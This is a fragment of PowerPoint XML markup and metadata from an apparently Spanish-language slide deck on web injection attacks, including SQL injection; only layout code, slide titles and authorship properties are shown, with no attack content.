            <a:off x="898687" y="3118802"/>
            <a:ext cx="1560818" cy="215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67BBEBF-BCEE-74F4-C5F5-D76CB365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17DFF43-E588-2129-FA82-332F7A4C50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8387D38-DA7C-35DE-CF8B-EA20375206BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="209550" y="209550"/>
            <a:ext cx="11982449" cy="6648450"/>
            <a:chOff x="209550" y="209550"/>
            <a:chExt cx="11982449" cy="664845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09819AF0-0226-31BA-CFCC-CEAF5F175FB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" y="5610225"/>
              <a:ext cx="3295649" cy="1247775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4B4BB69-4995-DABA-DEF5-317F648582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3675" y="209550"/>
              <a:ext cx="1838324" cy="2095499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D0DF3189-F5C2-76BB-54A2-C78DFB74470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16212" y="2898099"/>
            <a:ext cx="6361186" cy="1062406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="229171" rIns="0" bIns="0" rtlCol="0" anchor="t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lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
              </a:rPr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394658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914</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>263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Web II: Inyecciones</vt:lpstr>
      <vt:lpstr>Inyecciones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</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>ÍNDICE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>¿Qué es SQL?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jaime bonafe macedo</dc:creator>
  <cp:lastModifiedBy>jaime bonafe macedo</cp:lastModifiedBy>
  <cp:revision>574</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-07T17:07:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-03T22:40:31Z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2025-10-07T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="LastSaved">
    <vt:filetime>2025-10-07T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Producer">
    <vt:lpwstr>GPL Ghostscript 9.26</vt:lpwstr>
  </property>
</Properties>
</file>